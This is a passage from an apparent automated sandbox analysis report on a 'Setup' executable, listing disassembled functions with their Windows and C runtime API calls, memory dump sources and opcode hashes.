                                                                                                                                                                      • Part of subcall function 69D86BBD: __EH_prolog3.LIBCMT ref: 69D86BC4
                                                                                                                                                                      • Part of subcall function 69D83B22: __EH_prolog3.LIBCMT ref: 69D83B29
                                                                                                                                                                      • Part of subcall function 69D89746: __EH_prolog3.LIBCMT ref: 69D8974D
                                                                                                                                                                      • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$_memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1663610674-0
                                                                                                                                                                    • Opcode ID: d983a84e48d94034173d4feb31bc7ca24ea6a3abe4f6791719c4ee2bbd447ad4
                                                                                                                                                                    • Instruction ID: 4e428d742a9fdf3d00e7a201822667f0e8f1c29dd9349f8b60fef1d2463cf3f8
                                                                                                                                                                    • Opcode Fuzzy Hash: d983a84e48d94034173d4feb31bc7ca24ea6a3abe4f6791719c4ee2bbd447ad4
                                                                                                                                                                    • Instruction Fuzzy Hash: C45136B5500245CFDB50CF68C581BC9BBA4AF25304F18C8B9CD99AF71AD770AA49CBB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB14D1 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB14D8
                                                                                                                                                                      • Part of subcall function 69DB3ACC: __EH_prolog3.LIBCMT ref: 69DB3AD3
                                                                                                                                                                      • Part of subcall function 69DB3ACC: _memcpy_s.LIBCMT ref: 69DB3B17
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$_memcpy_s
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1663610674-0
                                                                                                                                                                    • Opcode ID: 8b83189008cbde7baf5909e010d52f7dadcd0ddde8fa5d00e3e988282c11fb33
                                                                                                                                                                    • Instruction ID: 3cf0e948aa2d5439039dd5cde33397ab8facce64f7cc64b672f7706dfca470a5
                                                                                                                                                                    • Opcode Fuzzy Hash: 8b83189008cbde7baf5909e010d52f7dadcd0ddde8fa5d00e3e988282c11fb33
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E4110B5A00149DFDF00DF98C884AAEBBB9FF08318F008569E9159B751CB71ED15CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F5DEE Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 698F5E81
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LongWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1378638983-0
                                                                                                                                                                    • Opcode ID: 469fe7aa1744aa9e44b02c022f2df6503c5c0bfc95dbb69aeba15cc612d9786d
                                                                                                                                                                    • Instruction ID: b52d8a47a73ba5e66c6f352d7845b0d4410093bbf8819d0b2b0bb805a3dd6692
                                                                                                                                                                    • Opcode Fuzzy Hash: 469fe7aa1744aa9e44b02c022f2df6503c5c0bfc95dbb69aeba15cc612d9786d
                                                                                                                                                                    • Instruction Fuzzy Hash: 61219C35500708AFCB20CF54C880AAEBBF5FF59390F10891EE856D7250D331E996EB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E64C2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698E64C9
                                                                                                                                                                      • Part of subcall function 698DD349: __EH_prolog3.LIBCMT ref: 698DD350
                                                                                                                                                                      • Part of subcall function 698DD76F: __EH_prolog3.LIBCMT ref: 698DD776
                                                                                                                                                                      • Part of subcall function 698DD2B6: __EH_prolog3.LIBCMT ref: 698DD2BD
                                                                                                                                                                      • Part of subcall function 698EF5FD: __EH_prolog3.LIBCMT ref: 698EF604
                                                                                                                                                                      • Part of subcall function 698EF5FD: __recalloc.LIBCMT ref: 698EF612
                                                                                                                                                                      • Part of subcall function 698DD4C5: __EH_prolog3.LIBCMT ref: 698DD4CC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$__recalloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1900422986-0
                                                                                                                                                                    • Opcode ID: ca5ab4296e40e7e177003e31a5311936d3ff4a90155cc684f545e3b24fbbe988
                                                                                                                                                                    • Instruction ID: c7773089927f7bf63a0fc60b7efc99856a309be0007cf2efeededc55f387e615
                                                                                                                                                                    • Opcode Fuzzy Hash: ca5ab4296e40e7e177003e31a5311936d3ff4a90155cc684f545e3b24fbbe988
                                                                                                                                                                    • Instruction Fuzzy Hash: CA2190369001189BCF00DFACC854ADEB7B4BF55358F14965DE525BB294EB34EA05CBB0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D92081 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D92088
                                                                                                                                                                      • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionH_prolog3Raise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 741760457-0
                                                                                                                                                                    • Opcode ID: 7e18a5ef39f73853f9c7f9211435a0991ae28b6ca21e46b6389723fdeacafead
                                                                                                                                                                    • Instruction ID: a00b4b5b5550fc5a7b968686879d84303d231691eb411c7220b7e73f098142a6
                                                                                                                                                                    • Opcode Fuzzy Hash: 7e18a5ef39f73853f9c7f9211435a0991ae28b6ca21e46b6389723fdeacafead
                                                                                                                                                                    • Instruction Fuzzy Hash: C62153B4A00A0ADFCB08CF29C190869BBF1FF59304B25C4ADD5499BB21D730E951CFA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB36BA Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69DB66E5: __EH_prolog3.LIBCMT ref: 69DB66EC
                                                                                                                                                                      • Part of subcall function 69DB66E5: GetCommandLineW.KERNEL32(00000024,69DB36CF,00000000,?,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498), ref: 69DB66F3
                                                                                                                                                                      • Part of subcall function 69DB66E5: GetUserDefaultUILanguage.KERNEL32(00000738,00000000,00000000,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?), ref: 69DB672F
                                                                                                                                                                      • Part of subcall function 69DB6782: __EH_prolog3.LIBCMT ref: 69DB6789
                                                                                                                                                                      • Part of subcall function 69DB6782: CoInitialize.OLE32(00000000), ref: 69DB67DD
                                                                                                                                                                      • Part of subcall function 69DB6782: CoCreateInstance.OLE32(69D6A974,00000000,00000017,69D6A9A4,69DAFA6E,?,?,?,UiInfo.xml,?,00000000,00000044,69DB36D8,02602230,?,00000000), ref: 69DB67FB
                                                                                                                                                                    • GetUserDefaultUILanguage.KERNEL32(02602230,?,00000000,?,?,?,?,69DB1338,?,00000010,69D85A14,?,?,?,0000004C,69DBB498), ref: 69DB36D8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DefaultH_prolog3LanguageUser$CommandCreateInitializeInstanceLine
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4049621043-0
                                                                                                                                                                    • Opcode ID: 8ab22d2b6698220958cb51a0b93b663887b16d6e4bd7d48e163c789395aeaa98
                                                                                                                                                                    • Instruction ID: 981362b2ed7efcec1e528341ca0ac540069f27f61163c53238118aae6419c59d
                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab22d2b6698220958cb51a0b93b663887b16d6e4bd7d48e163c789395aeaa98
                                                                                                                                                                    • Instruction Fuzzy Hash: 470108BA5016419FE314CF39C8C0C5AB395EF412B0B60C339E5B68AAD4E734D8019B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 009A61AE Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,009A4F98,?,?,00000000,00000000,00000000,?,009A3A5D,00000001,00000214,?,009A2FA5), ref: 009A61F1
                                                                                                                                                                      • Part of subcall function 009A47E5: __getptd_noexit.LIBCMT ref: 009A47E5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4195128625.00000000009A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195262631.00000000009A8000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4195338114.00000000009AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_9a0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                    • Opcode ID: 28b1520338032190ad9779dabf6d127691416fbee7f91680a53d6413938be314
                                                                                                                                                                    • Instruction ID: 1bbd947876873cb39f1387d0dee4e0532e28bd2773f081c88de475bbdfd538eb
                                                                                                                                                                    • Opcode Fuzzy Hash: 28b1520338032190ad9779dabf6d127691416fbee7f91680a53d6413938be314
                                                                                                                                                                    • Instruction Fuzzy Hash: B00171353052159BEB289F65EC55BAA3B9CAF83764F084A29ED26CB590DB74D800C7D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698FD6DC Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,698F9F86,698F91D6,?,00000000,00000000,00000000,?,698F9B8D,00000001,00000214,?,698FB575), ref: 698FD71F
                                                                                                                                                                      • Part of subcall function 698FB570: __getptd_noexit.LIBCMT ref: 698FB570
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                    • Opcode ID: 0b4e455c5bbbae7f8137169964d0d91d96e0ea48beca62be93b81afa871b3cf9
                                                                                                                                                                    • Instruction ID: 4d0f5e52c13664ac4d5034e5a166f2c48a66fe08eb48afcaee5952072cc7ebfd
                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4e455c5bbbae7f8137169964d0d91d96e0ea48beca62be93b81afa871b3cf9
                                                                                                                                                                    • Instruction Fuzzy Hash: 3E01B1392052159BEB199E64C858B6A37A4BF923E4F00AD2EEA27CF1D0D730D403C690
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DD0EDA Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,69DCD777,69DCC0C9,?,00000000,00000000,00000000,?,69DCD37E,00000001,00000214,?,69DA831D), ref: 69DD0F1D
                                                                                                                                                                      • Part of subcall function 69DCBD29: __getptd_noexit.LIBCMT ref: 69DCBD29
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                                    • Opcode ID: 6ef3d1edc93525e94d732b809569068ce448eb83cb51edd12d060caa3a0a7a96
                                                                                                                                                                    • Instruction ID: 9ed56db9280df4ad1806c674e98caa574bd6c38613eda16a24ccc2cf44c99baa
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ef3d1edc93525e94d732b809569068ce448eb83cb51edd12d060caa3a0a7a96
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B01BC35209215DAFB198F75DC14B5A37A8BFC23A1F208539F829CB990C7B1D808C790
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D83B22 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D83B29
                                                                                                                                                                      • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionH_prolog3Raise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 741760457-0
                                                                                                                                                                    • Opcode ID: dc74cb09e5b669f49556aab12fc2475cd7b63c00b120f8265ee9e30dbabcfdb3
                                                                                                                                                                    • Instruction ID: 4a74df28aba8f437671c523c1f4f6eb1f128a389526c577f8c2b1fa8a50e1aaa
                                                                                                                                                                    • Opcode Fuzzy Hash: dc74cb09e5b669f49556aab12fc2475cd7b63c00b120f8265ee9e30dbabcfdb3
                                                                                                                                                                    • Instruction Fuzzy Hash: 78116DB4A00A06DFDB08CF69C580829F7B4FF59304710D979E1199BA21E731B555CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D89746 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D8974D
                                                                                                                                                                      • Part of subcall function 69DC78C8: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,69DB139B,?,00000010,69D85A14,?,?,?,0000004C,69DBB498,?,?,?), ref: 69DC78D3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionH_prolog3Raise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 741760457-0
                                                                                                                                                                    • Opcode ID: ca1a84172b0b5350ec03fa68e81d168bcff82e827fc527d3c6258a1a045882c1
                                                                                                                                                                    • Instruction ID: 69f35289809d15913d5b2072297d2c5f1f6a45fe2f51cd9a85218fc04ff7980d
                                                                                                                                                                    • Opcode Fuzzy Hash: ca1a84172b0b5350ec03fa68e81d168bcff82e827fc527d3c6258a1a045882c1
                                                                                                                                                                    • Instruction Fuzzy Hash: 98116D78A00A06EFD708CF79CA80959B7F0FF94308710C579D0999BA21D731E946CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D86083 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                    • Opcode ID: 298ec9b1148d34ed4969068aa9056a0ed294b71dea51c478f1cb6b397ec56ad7
                                                                                                                                                                    • Instruction ID: cca316e6d6deb8ea2ab0b74802760bae47ae36804d9bc24fb28f81f663df5f8f
                                                                                                                                                                    • Opcode Fuzzy Hash: 298ec9b1148d34ed4969068aa9056a0ed294b71dea51c478f1cb6b397ec56ad7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0B11E53A110906CFCB22CF64C78094FB3B5BF90328B505675D16597A96CB30F44A8BA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D7BE52 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 4c4787141846c622c04080f2208d1ee1ef579622d26555e3ec0fbdf997e4b86f
                                                                                                                                                                    • Instruction ID: f4f6d225984c1b0147856f0017fac0cefa5629184af06572da3a8ecca27223e3
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c4787141846c622c04080f2208d1ee1ef579622d26555e3ec0fbdf997e4b86f
                                                                                                                                                                    • Instruction Fuzzy Hash: 55113974A00728EFCB10DFA8C88499DBBA9BF09714B10D569F919DF794C734DA41CBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698EF024 Relevance: 1.5, APIs: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindResourceW.KERNEL32(?,?,00000006,69912F8C,00000000,?,698EF018,00000000,?,00000000,?,?,?,?,?,698EE923), ref: 698EF03D
                                                                                                                                                                      • Part of subcall function 698F7A10: LoadResource.KERNEL32(?,?,?,?,698EF053,?,00000000,?,698EF018,00000000,?,00000000,?,?), ref: 698F7A1E
